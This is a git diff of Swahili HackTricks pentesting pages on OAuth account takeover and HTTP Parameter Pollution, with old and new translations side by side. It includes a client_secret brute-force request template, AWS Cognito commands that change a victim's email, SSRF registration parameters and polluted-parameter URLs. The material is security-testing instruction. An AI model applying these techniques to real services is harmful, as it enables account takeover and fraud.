2. **Kutumia Uthibitishaji wa Barua pepe wa Lax OAuth**: Wachomaji wanaweza kutumia huduma za OAuth ambazo hazithibitishi barua pepe kwa kusajili na huduma yao na kisha kubadilisha barua pepe ya akaunti kuwa ya muathiriwa. Mbinu hii ina hatari sawa ya ufikiaji usioidhinishwa wa akaunti, kama kwenye kisa cha kwanza lakini kupitia vector tofauti wa shambulizi.
|
||||
|
||||
### Kufichua Siri <a href="#e177" id="e177"></a>
|
||||
|
||||
Kutambua na kulinda vigezo vya siri vya OAuth ni muhimu. Ingawa **`client_id`** inaweza kufichuliwa salama, kufichua **`client_secret`** kunasababisha hatari kubwa. Ikiwa `client_secret` inaingiliwa, wadukuzi wanaweza kutumia utambulisho na imani ya programu kuiba **`access_tokens`** za watumiaji na habari za kibinafsi.
|
||||
Kutambua na kulinda paramita za siri za OAuth ni muhimu. Ingawa **`client_id`** inaweza kufichuliwa salama, kufunua **`client_secret`** kunaweza kuleta hatari kubwa. Ikiwa `client_secret` itafichuliwa, wachomaji wanaweza kutumia kitambulisho na imani ya programu kuiba **`access_tokens`** za watumiaji na habari za kibinafsi.
|
||||
|
||||
Udhaifu wa kawaida unatokea wakati programu inashughulikia ubadilishaji wa `code` ya idhini kwa `access_token` upande wa mteja badala ya upande wa seva. Kosa hili husababisha kufichuliwa kwa `client_secret`, kuruhusu wadukuzi kuzalisha `access_tokens` kwa udanganyifu wa programu. Zaidi ya hayo, kupitia uhandisi wa kijamii, wadukuzi wanaweza kuongeza mamlaka kwa kuongeza wigo zaidi kwa idhini ya OAuth, hivyo kudhoofisha hadhi ya programu.
|
||||
Udhaifu wa kawaida unatokea wakati programu zinashughulikia kwa makosa kubadilishana ya `code` ya idhini kwa `access_token` upande wa mteja badala ya upande wa seva. Kosa hili husababisha kufichuliwa kwa `client_secret`, kuruhusu wachomaji kuzalisha `access_tokens` chini ya kivuli cha programu. Zaidi ya hayo, kupitia uhandisi wa kijamii, wachomaji wanaweza kuongeza mamlaka kwa kuongeza mizunguko zaidi kwa idhini ya OAuth, kuchimba zaidi hadhi ya kuaminika ya programu.
|
||||
|
||||
### Kuvunja Nguvu ya Siri ya Mteja
|
||||
### Kuvunja Neno la Siri la Mteja
|
||||
|
||||
Unaweza kujaribu **kuvunja nguvu ya siri ya mteja** wa mtoa huduma na mtoa huduma wa kitambulisho ili kujaribu kuiba akaunti.\
|
||||
Ombi la kuvunja nguvu linaweza kuonekana kama ifuatavyo:
|
||||
Unaweza kujaribu **kuvunja neno la siri la mteja** wa mtoa huduma na mtoa huduma wa kitambulisho ili kujaribu kuiba akaunti.\
|
||||
Ombi la BF linaweza kuonekana kama:
|
||||
```
|
||||
POST /token HTTP/1.1
|
||||
content-type: application/x-www-form-urlencoded
|
||||
|
@ -118,29 +123,29 @@ Connection: close
|
|||
|
||||
code=77515&redirect_uri=http%3A%2F%2F10.10.10.10%3A3000%2Fcallback&grant_type=authorization_code&client_id=public_client_id&client_secret=[bruteforce]
|
||||
```
|
||||
### Kichwa cha habari cha Referer kinachovuja Kanuni + Hali
|
||||
### Kichwa cha Referer kuvuja Msimbo + Hali
|
||||
|
||||
Mara tu mteja anapopata **kanuni na hali**, ikiwa ina **reflected ndani ya kichwa cha habari cha Referer** wakati anapata ukurasa tofauti, basi ina udhaifu.
|
||||
Mara tu mteja anapopata **msimbo na hali**, ikiwa **inajitokeza ndani ya kichwa cha Referer** anapobofya ukurasa tofauti, basi ni hatarishi.
|
||||
|
||||
### Kitufe cha Kufikia Kimehifadhiwa kwenye Historia ya Kivinjari
|
||||
### Funguo la Kufikia lililohifadhiwa katika Historia ya Kivinjari
|
||||
|
||||
Nenda kwenye **historia ya kivinjari na angalia ikiwa kitufe cha kufikia kimehifadhiwa hapo**.
|
||||
Nenda kwenye **historia ya kivinjari na angalia ikiwa funguo la kufikia limehifadhiwa hapo**.
|
||||
|
||||
### Kanuni ya Idhini Isiyokoma
|
||||
### Msimbo wa Kibali wa Milele
|
||||
|
||||
**Kanuni ya idhini inapaswa kuishi kwa muda fulani ili kupunguza dirisha la wakati ambapo mshambuliaji anaweza kuiba na kuitumia**.
|
||||
**Msimbo wa kibali unapaswa kuishi kwa muda fulani tu ili kupunguza dirisha la muda ambapo mshambuliaji anaweza kuiba na kutumia**.
|
||||
|
||||
### Kitufe cha Idhini / Kiboreshaji kisichounganishwa na mteja
|
||||
### Msimbo wa Kibali/Msimbo wa Kufufua usiofungwa kwa mteja
|
||||
|
||||
Ikiwa unaweza kupata **kanuni ya idhini na kuitumia na mteja tofauti basi unaweza kuchukua udhibiti wa akaunti nyingine**.
|
||||
Ikiwa unaweza kupata **msimbo wa kibali na kutumia na mteja tofauti basi unaweza kuchukua akaunti za wengine**.
|
||||
|
||||
### Njia za Furaha, XSS, Iframes & Ujumbe wa Post kuvuja kanuni & hali
|
||||
### Njia za Furaha, XSS, Iframes & Ujumbe wa Post kuvuja msimbo & hali
|
||||
|
||||
**[Angalia chapisho hili](https://labs.detectify.com/writeups/account-hijacking-using-dirty-dancing-in-sign-in-oauth-flows/#gadget-2-xss-on-sandbox-third-party-domain-that-gets-the-url)**
|
||||
|
||||
### AWS Cognito <a href="#bda5" id="bda5"></a>
|
||||
|
||||
Katika ripoti hii ya tuzo ya mdudu: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) unaweza kuona kuwa **kitufe** ambacho **AWS Cognito** inarudisha kwa mtumiaji kinaweza kuwa na **mamlaka ya kutosha ya kuandika tena data ya mtumiaji**. Kwa hivyo, ikiwa unaweza **kubadilisha barua pepe ya mtumiaji kwa barua pepe tofauti ya mtumiaji**, huenda uka **chukua udhibiti** wa akaunti za wengine.
|
||||
Katika ripoti ya tuzo ya mdudu huyu: [**https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/**](https://security.lauritz-holtmann.de/advisories/flickr-account-takeover/) unaweza kuona kwamba **funguo** ambao **AWS Cognito** inampa mtumiaji huenda ukawa na **idhini za kutosha za kubadilisha data ya mtumiaji**. Kwa hivyo, ikiwa unaweza **kubadilisha barua pepe ya mtumiaji kwa barua pepe ya mtumiaji tofauti**, unaweza **kuchukua** akaunti za wengine.
|
||||
```bash
|
||||
# Read info of the user
|
||||
aws cognito-idp get-user --region us-east-1 --access-token eyJraWQiOiJPVj[...]
|
||||
|
@ -157,66 +162,67 @@ aws cognito-idp update-user-attributes --region us-east-1 --access-token eyJraWQ
|
|||
]
|
||||
}
|
||||
```
|
||||
Kwa habari zaidi kuhusu jinsi ya kutumia AWS Cognito angalia:
|
||||
### Kudanganya Vyeti vya Programu Nyingine <a href="#bda5" id="bda5"></a>
|
||||
|
||||
{% embed url="https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-unauthenticated-enum-access/aws-cognito-unauthenticated-enum" %}
|
||||
Kama ilivyotajwa katika [**makala hii**](https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts), Mifumo ya OAuth ambayo inatarajia kupokea **tokeni** (na sio nambari) inaweza kuwa hatarini ikiwa haitathibitisha kuwa tokeni inamilikiwa na programu.
|
||||
|
||||
### Kutumia vibaya vitufe vya programu nyingine <a href="#bda5" id="bda5"></a>
|
||||
|
||||
Kama [**ilivyotajwa katika nakala hii**](https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts), mifumo ya OAuth ambayo inatarajia kupokea **kitufe** (na sio nambari) inaweza kuwa na udhaifu ikiwa haitathibitishi kwamba kitufe kinamilikiwa na programu.
|
||||
|
||||
Hii ni kwa sababu **mshambuliaji** anaweza kuunda **programu inayounga mkono OAuth na kuingia kwa kutumia Facebook** (kwa mfano) katika programu yake mwenyewe. Kisha, mara baada ya muathirika kuingia kwa kutumia Facebook katika **programu ya mshambuliaji**, mshambuliaji anaweza kupata **kitufe cha OAuth cha mtumiaji kilichotolewa kwa programu yake, na kukitumia kuingia katika programu ya OAuth ya muathirika kwa kutumia kitufe cha mtumiaji cha muathirika**.
|
||||
Hii ni kwa sababu **mshambuliaji** anaweza kuunda **programu inayounga mkono OAuth na kuingia kwa kutumia Facebook** (kwa mfano) katika programu yake mwenyewe. Kisha, mara tu muathiriwa anapojiingia kwa kutumia Facebook katika **programu ya mshambuliaji**, mshambuliaji anaweza kupata **tokeni ya OAuth ya mtumiaji iliyotolewa kwa programu yake, na kuitumia kuingia katika programu ya OAuth ya muathiriwa kwa kutumia tokeni ya mtumiaji wa muathiriwa**.
|
||||
|
||||
{% hint style="danger" %}
|
||||
Kwa hiyo, ikiwa mshambuliaji anafanikiwa kupata mtumiaji kufikia programu yake ya OAuth, ataweza kuchukua udhibiti wa akaunti ya muathirika katika programu ambazo zinatarajia kitufe na hazithibitishi ikiwa kitufe kilipewa ID yao ya programu.
|
||||
Hivyo, ikiwa mshambuliaji anafanikiwa kupata mtumiaji kumruhusu kutumia programu yake ya OAuth, ataweza kuchukua akaunti ya muathiriwa katika programu ambazo zinatarajia tokeni na hazithibitishi ikiwa tokeni ilitolewa kwa kitambulisho cha programu yao.
|
||||
{% endhint %}
|
||||
|
||||
### Viungo viwili na kuki <a href="#bda5" id="bda5"></a>
|
||||
### Viungo viwili & kuki <a href="#bda5" id="bda5"></a>
|
||||
|
||||
Kulingana na [**nakala hii**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), ilikuwa inawezekana kufanya muathirika afungue ukurasa na **returnUrl** inayoelekeza kwenye mwenyeji wa mshambuliaji. Habari hii ingehifadhiwa katika kuki (RU) na katika hatua ya baadaye, **kielekezi** kitauliza **mtumiaji** ikiwa anataka kutoa ufikiaji kwa mwenyeji huyo wa mshambuliaji.
|
||||
Kulingana na [**makala hii**](https://medium.com/@metnew/why-electron-apps-cant-store-your-secrets-confidentially-inspect-option-a49950d6d51f), ilikuwa inawezekana kumfanya muathiriwa afungue ukurasa na **returnUrl** inayoashiria kwenye mwenyeji wa mshambuliaji. Taarifa hii ingehifadhiwa katika kuki (RU) na katika **hatua inayofuata** **prompt** itamuuliza **mtumiaji** ikiwa anataka kutoa ruhusa kwa mwenyeji huyo wa mshambuliaji.
|
||||
|
||||
Ili kuepuka kielekezi hiki, ilikuwa inawezekana kufungua kichupo ili kuanzisha **mtiririko wa OAuth** ambao ungehifadhi kuki hii ya RU kwa kutumia **returnUrl**, kufunga kichupo kabla ya kielekezi kuonyeshwa, na kufungua kichupo kipya bila thamani hiyo. Kwa hiyo, **kielekezi hakitatoa habari kuhusu mwenyeji wa mshambuliaji**, lakini kuki itakuwa imewekwa kwake, hivyo **kitufe kitatumwa kwa mwenyeji wa mshambuliaji** katika uhamishaji.
|
||||
Ili kuepuka prompt hii, ilikuwa inawezekana kufungua kichupo kuanzisha **mtiririko wa Oauth** ambao ungehifadhi kuki hii ya RU kwa kutumia **returnUrl**, kufunga kichupo kabla ya prompt kuonyeshwa, na kufungua kichupo kipya bila thamani hiyo. Kisha, **prompt haitaonyesha kuhusu mwenyeji wa mshambuliaji**, lakini kuki itahifadhiwa kwake, hivyo **tokeni itatumwa kwa mwenyeji wa mshambuliaji** katika uendeshaji.
|
||||
|
||||
### Parameta za SSRF <a href="#bda5" id="bda5"></a>
|
||||
### Vigezo vya SSRFs <a href="#bda5" id="bda5"></a>
|
||||
|
||||
**[Angalia utafiti huu](https://portswigger.net/research/hidden-oauth-attack-vectors) kwa maelezo zaidi kuhusu mbinu hii.**
|
||||
|
||||
Usajili wa Mteja wa Kudumu katika OAuth unatumika kama njia isiyoeleweka lakini muhimu kwa udhaifu wa usalama, hasa kwa mashambulizi ya **Server-Side Request Forgery (SSRF)**. Kipengele hiki kinawezesha seva za OAuth kupokea maelezo kuhusu programu za wateja, ikiwa ni pamoja na URL nyeti ambazo zinaweza kudukuliwa.
|
||||
Usajili wa Mteja wa Kudumu katika OAuth unatumika kama vectori isiyo wazi lakini muhimu kwa mapungufu ya usalama, hasa kwa mashambulizi ya **Server-Side Request Forgery (SSRF)**. Kipengele hiki huruhusu seva za OAuth kupokea maelezo kuhusu programu za wateja, ikiwa ni pamoja na URL nyeti ambazo zinaweza kutumiwa vibaya.
|
||||
|
||||
**Mambo muhimu:**
|
||||
**Muhimu:**
|
||||
|
||||
- Usajili wa Mteja wa Kudumu mara nyingi unahusishwa na `/register` na unakubali maelezo kama vile `client_name`, `client_secret`, `redirect_uris`, na URL kwa ajili ya nembo au JSON Web Key Sets (JWKs) kupitia maombi ya POST.
|
||||
- Kipengele hiki kinazingatia maelekezo yaliyowekwa katika **RFC7591** na **OpenID Connect Registration 1.0**, ambayo ni pamoja na parameta ambazo zinaweza kuwa na udhaifu wa SSRF.
|
||||
- Mchakato wa usajili unaweza kusababisha seva kuwa wazi kwa SSRF kwa njia kadhaa:
|
||||
- **`logo_uri`**: URL kwa nembo ya programu ya mteja ambayo inaweza kupatikana na seva, ikisababisha SSRF au kusababisha XSS ikiwa URL haikushughulikiwa vizuri.
|
||||
- **`jwks_uri`**: URL kwa hati ya JWK ya mteja, ambayo ikiwa imeundwa kwa nia mbaya, inaweza kusababisha seva kufanya maombi ya kutoka kwa seva inayodhibitiwa na mshambuliaji.
|
||||
- **`sector_identifier_uri`**: Inahusisha orodha ya JSON ya `redirect_uris`, ambayo seva inaweza kupata, ikiumba fursa ya SSRF.
|
||||
- **`request_uris`**: Inaorodhesha URI za maombi zilizoruhusiwa kwa mteja, ambazo zinaweza kudukuliwa ikiwa seva inapata URI hizi mwanzoni mwa mchakato wa idhini.
|
||||
- **Usajili wa Mteja wa Kudumu** mara nyingi unahusishwa na `/register` na hukubali maelezo kama vile `client_name`, `client_secret`, `redirect_uris`, na URLs za vielelezo au Seti za Muhimu za Wavuti za JSON (JWKs) kupitia maombi ya POST.
|
||||
- Kipengele hiki kinazingatia maelekezo yaliyowekwa katika **RFC7591** na **Usajili wa OpenID Connect 1.0**, ambayo ni pamoja na vigezo vinavyoweza kuwa hatarini kwa SSRF.
|
||||
- Mchakato wa usajili unaweza kwa bahati mbaya kuweka wazi seva kwa SSRF kwa njia kadhaa:
|
||||
- **`logo_uri`**: URL kwa vielelezo vya programu ya mteja ambayo inaweza kupakuliwa na seva, ikichochea SSRF au kusababisha XSS ikiwa URL itashughulikiwa vibaya.
|
||||
- **`jwks_uri`**: URL kwa hati ya JWK ya mteja, ambayo ikipangwa kwa udanganyifu, inaweza kusababisha seva kufanya maombi ya kutoka kwenda kwa seva inayodhibitiwa na mshambuliaji.
|
||||
- **`sector_identifier_uri`**: Inahusisha safu ya JSON ya `redirect_uris`, ambayo seva inaweza kupakua, ikiumba fursa ya SSRF.
|
||||
- **`request_uris`**: Inaorodhesha URI zilizoruhusiwa za ombi kwa mteja, ambazo zinaweza kutumiwa vibaya ikiwa seva itapakua URI hizi mwanzoni mwa mchakato wa idhini.
|
||||
|
||||
**Mbinu ya Udukuzi:**
|
||||
**Stratejia ya Utekaji:**
|
||||
|
||||
- SSRF inaweza kusababishwa kwa kusajili mteja mpya na URL mbaya katika parameta kama vile `logo_uri`, `jwks_uri`, au `sector_identifier_uri`.
|
||||
- Ingawa udukuzi wa moja kwa moja kupitia `request_uris` unaweza kudhibitiwa na udhibiti wa orodha nyeupe, kutoa `request_uri` iliyosajiliwa mapema na inayodhibitiwa na mshambuliaji kunaweza kurahisisha SSRF wakati wa hatua ya idhini.
|
||||
- SSRF inaweza kuanzishwa kwa kusajili mteja mpya na URL zenye nia mbaya katika vigezo kama `logo_uri`, `jwks_uri`, au `sector_identifier_uri`.
|
||||
- Ingawa utekelezaji wa moja kwa moja kupitia `request_uris` unaweza kupunguzwa na udhibiti wa orodha nyeupe, kutoa `request_uri` iliyosajiliwa mapema, inayodhibitiwa na mshambuliaji, inaweza kurahisisha SSRF wakati wa hatua ya idhini.
|
||||
|
||||
## Masharti ya OAuth ya Masharti ya Mashindano
|
||||
## Masharti ya Mashindano ya Watoa Huduma wa OAuth
|
||||
|
||||
Ikiwa jukwaa unayopima ni mtoa huduma wa OAuth [**soma hii ili kujaribu Masharti ya Mashindano yanayowezekana**](race-condition.md).
|
||||
Ikiwa jukwaa unalolipima ni mtoa huduma wa OAuth [**soma hii ili kujaribu Mashindano ya Watoa Huduma**](race-condition.md).
|
||||
|
||||
## Marejeo
|
||||
|
||||
* [**https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1**](https://medium.com/a-bugz-life/the-wondeful-world-of-oauth-bug-bounty-edition-af3073b354c1)
|
||||
* [**https://portswigger.net/research/hidden-oauth-attack-vectors**](https://portswigger.net/research/hidden-oauth-attack-vectors)
|
||||
|
||||
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inayotangazwa katika HackTricks** au **kupakua HackTricks katika PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,23 +2,28 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Jifunze kuhusu uchomaji wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Njia nyingine za kusaidia HackTricks:
|
||||
|
||||
* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
|
||||
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
|
||||
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Shiriki mbinu zako za uchomaji kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
|
||||
|
||||
</details>
|
||||
|
||||
# Mapitio ya Uchafuzi wa Parameta ya HTTP (HPP)
|
||||
<figure><img src="/.gitbook/assets/WebSec_1500x400_10fps_21sn_lightoptimized_v2.gif" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Uchafuzi wa Parameta ya HTTP (HPP) ni mbinu ambapo wadukuzi wanabadilisha parameta za HTTP ili kubadilisha tabia ya programu ya wavuti kwa njia ambayo haikukusudiwa. Ubadilishaji huu unafanywa kwa kuongeza, kubadilisha, au kunakili parameta za HTTP. Athari za ubadilishaji huu hazionekani moja kwa moja kwa mtumiaji lakini zinaweza kubadilisha sana utendaji wa programu kwenye upande wa seva, na kuathiriwa kwa njia inayoweza kuonekana kwa upande wa mteja.
|
||||
{% embed url="https://websec.nl/" %}
|
||||
|
||||
## Mfano wa Uchafuzi wa Parameta ya HTTP (HPP)
|
||||
|
||||
# Muhtasari wa Uchafuzi wa Parameta za HTTP (HPP)
|
||||
|
||||
Uchafuzi wa Parameta za HTTP (HPP) ni mbinu ambapo wadukuzi wanabadilisha parameta za HTTP kubadilisha tabia ya programu ya wavuti kwa njia ambayo haikukusudiwa. Ubadilishaji huu hufanywa kwa kuongeza, kurekebisha, au kunakili parameta za HTTP. Athari za ubadilishaji huu hazionekani moja kwa moja kwa mtumiaji lakini zinaweza kubadilisha kwa kiasi kikubwa utendaji wa programu kwenye upande wa seva, na kuathiriwa kwa njia inayoonekana kwa mtumiaji.
|
||||
|
||||
## Mfano wa Uchafuzi wa Parameta za HTTP (HPP)
|
||||
|
||||
URL ya shughuli ya programu ya benki:
|
||||
|
||||
|
@ -26,55 +31,60 @@ URL ya shughuli ya programu ya benki:
|
|||
|
||||
Kwa kuingiza parameta ya ziada ya `from`:
|
||||
|
||||
- **URL Iliyochafuliwa:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`
|
||||
- **URL Iliyobadilishwa:** `https://www.victim.com/send/?from=accountA&to=accountB&amount=10000&from=accountC`
|
||||
|
||||
Shughuli inaweza kutozwa kwa usahihi kwa akaunti ya `accountC` badala ya `accountA`, ikionyesha uwezo wa HPP kubadilisha shughuli au utendaji mwingine kama vile kurekebisha nywila, mipangilio ya 2FA, au ombi la ufunguo wa API.
|
||||
Shughuli inaweza kutozwa kwa usahihi kwa akaunti ya `accountC` badala ya `accountA`, ikionyesha uwezo wa HPP kudhibiti shughuli au utendaji mwingine kama vile kurekebisha nywila, mipangilio ya uthibitishaji wa hatua mbili, au ombi la ufunguo wa API.
|
||||
|
||||
### **Uchanganuzi wa Parameta kulingana na Teknolojia Maalum**
|
||||
### **Uchambuzi wa Parameta kulingana na Teknolojia**
|
||||
|
||||
- Jinsi parameta zinavyochanganuliwa na kupewa kipaumbele inategemea teknolojia ya wavuti iliyo chini, ikiaathiri jinsi HPP inaweza kudukuliwa.
|
||||
- Zana kama [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/) husaidia kutambua teknolojia hizi na tabia zao za uchanganuzi.
|
||||
- Jinsi parameta zinavyochambuliwa na kupewa kipaumbele inategemea teknolojia ya wavuti inayotumika, ikibadilisha jinsi HPP inavyoweza kutumiwa.
|
||||
- Zana kama [Wappalyzer](https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/) husaidia kutambua teknolojia hizi na tabia zao za uchambuzi.
|
||||
|
||||
## PHP na Uchomaji wa HPP
|
||||
## Udukuzi wa PHP na HPP
|
||||
|
||||
**Kesi ya Uchomaji wa OTP:**
|
||||
**Kesi ya Udukuzi wa OTP:**
|
||||
|
||||
- **Mazingira:** Mfumo wa kuingia unahitaji Nenosiri la Mara Moja (OTP) ulidukuliwa.
|
||||
- **Njia:** Kwa kuvuruga ombi la OTP kwa kutumia zana kama Burp Suite, wadukuzi walidondosha parameta ya `barua pepe` katika ombi la HTTP.
|
||||
- **Matokeo:** OTP, iliyokusudiwa kwa barua pepe ya awali, badala yake ilipelekwa kwa anwani ya barua pepe ya pili iliyoainishwa katika ombi lililodanganywa. Kasoro hii iliruhusu ufikiaji usiohalali kwa kuzunguka hatua ya usalama iliyokusudiwa.
|
||||
- **Muktadha:** Mfumo wa kuingia unahitaji Nenosiri la Mara Moja (OTP) ulidukuliwa.
|
||||
- **Mbinu:** Kwa kuingilia kati ombi la OTP kwa kutumia zana kama Burp Suite, wadukuzi walikariri parameta ya `barua pepe` katika ombi la HTTP.
|
||||
- **Matokeo:** OTP, iliyokusudiwa kwa barua pepe ya awali, badala yake ilipelekwa kwa anwani ya barua pepe ya pili iliyotajwa katika ombi lililobadilishwa. Kasoro hii iliruhusu ufikiaji usiohalali kwa kuzunguka hatua ya usalama iliyokusudiwa.
|
||||
|
||||
Hali hii inaonyesha kosa kubwa katika sehemu ya nyuma ya programu, ambayo ilichakata parameta ya kwanza ya `barua pepe` kwa kizazi cha OTP lakini iliyotumia ya mwisho kwa utoaji.
|
||||
Hali hii inaonyesha kosa kubwa katika sehemu ya nyuma ya programu, ambayo ilichakata parameta ya kwanza ya `barua pepe` kwa kizazi cha OTP lakini ilitumia ya mwisho kwa utoaji.
|
||||
|
||||
**Kesi ya Uchomaji wa Ufunguo wa API:**
|
||||
**Kesi ya Udukuzi wa Ufunguo wa API:**
|
||||
|
||||
- **Hali:** Programu inaruhusu watumiaji kusasisha ufunguo wao wa API kupitia ukurasa wa mipangilio ya wasifu.
|
||||
- **Mfumo wa Shambulio:** Mshambuliaji anagundua kuwa kwa kuongeza parameta ya ziada ya `api_key` kwa ombi la POST, wanaweza kudhibiti matokeo ya kazi ya kusasisha ufunguo wa API.
|
||||
- **Mbinu:** Kwa kutumia zana kama Burp Suite, mshambuliaji anatengeneza ombi ambalo linajumuisha parameta mbili za `api_key`: moja halali na moja yenye nia mbaya. Seva, ikichakata tu tukio la mwisho, inasasisha ufunguo wa API kwa thamani iliyotolewa na mshambuliaji.
|
||||
- **Matokeo:** Mshambuliaji anapata udhibiti juu ya utendaji wa API ya mwathirika, na uwezekano wa kupata au kurekebisha data binafsi bila idhini.
|
||||
- **Mwelekeo wa Shambulio:** Mdau anagundua kwamba kwa kuongeza parameta ya ziada ya `api_key` kwa ombi la POST, wanaweza kudhibiti matokeo ya kazi ya kusasisha ufunguo wa API.
|
||||
- **Mbinu:** Kwa kutumia zana kama Burp Suite, mdau anatengeneza ombi linalojumuisha parameta mbili za `api_key`: moja halali na moja yenye nia mbaya. Seva, ikichakata tu tukio la mwisho, inasasisha ufunguo wa API kwa thamani iliyotolewa na mdau.
|
||||
- **Matokeo:** Mdau anapata udhibiti wa utendaji wa API wa muathiriwa, labda kupata au kurekebisha data binafsi bila idhini.
|
||||
|
||||
Mfano huu unasisitiza umuhimu wa kushughulikia parameta kwa usalama, haswa katika vipengele muhimu kama usimamizi wa ufunguo wa API.
|
||||
Mfano huu unasisitiza zaidi umuhimu wa kushughulikia parameta kwa usalama, hasa katika vipengele muhimu kama usimamizi wa ufunguo wa API.
|
||||
|
||||
## Uchanganuzi wa Parameta: Flask vs PHP
|
||||
## Uchambuzi wa Parameta: Flask vs. PHP
|
||||
|
||||
Jinsi teknolojia za wavuti zinavyoshughulikia parameta za HTTP zinatofautiana, zikiathiri hatari yao kwa mashambulizi ya HPP:
|
||||
Jinsi teknolojia za wavuti zinavyoshughulikia parameta za HTTP zinatofautiana, zikibadilisha hatari yao kwa mashambulizi ya HPP:
|
||||
|
||||
- **Flask:** Inachukua thamani ya kwanza ya parameta iliyokutwa, kama vile `a=1` katika mfuatano wa utafutaji `a=1&a=2`, ikipewa kipaumbele kwa kesi ya kwanza kuliko nakala zinazofuata.
|
||||
- **PHP (kwenye Seva ya HTTP ya Apache):** Kinyume chake, inapewa kipaumbele thamani ya mwisho ya parameta, ikichagua `a=2` katika mfano uliotolewa. Tabia hii inaweza kwa bahati mbaya kuwezesha mashambulizi ya HPP kwa kuheshimu parameta iliyodanganywa ya mshambuliaji badala ya ile ya asili.
|
||||
